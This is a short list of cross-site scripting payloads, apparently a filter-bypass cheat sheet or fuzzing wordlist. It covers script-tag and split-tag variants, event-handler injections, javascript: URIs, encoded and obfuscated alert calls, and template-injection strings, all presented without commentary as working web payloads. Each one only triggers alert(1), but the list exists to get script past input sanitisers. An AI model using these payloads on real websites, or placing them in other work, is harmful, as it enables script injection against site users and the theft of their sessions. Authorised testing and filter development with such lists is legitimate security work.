&lt;script&gt;alert(1)&lt;/script&gt;
<scr<script>ipt>alert(1)</scr<script>ipt>
<script\x3Ealert(1)</script>
javascript:alert(1)
<svg onload=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)>
<svg onload=alert(1)>
" onmouseover="alert(1)
' onfocus=alert(1) autofocus='
<iframe src="javascript:alert(1)">
<svg><script>alert`1`</script>
<svg><script>alert`1`</script>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
{{constructor.constructor('alert(1)')()}}
{{a='alert(1)', (a)()}}
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<scr<script>ipt>alert(1)</scr</script>ipt>
  --> Json
"};alert(1);var foo={
";alert(1);// 
---
<ScRiPt>alert(1)</ScRiPt>
<script>eval("al"+"ert(1)")</script>
<script>Function("ale"+"rt(1)")()</script>
javascript:var{a:onerror}={a:%2561lert};throw%20origin
top[8680439..toString(30)](1337)
top.alert.call(null,1)
eval(\u0061lert(1))
onerror=\u0061lert(1)
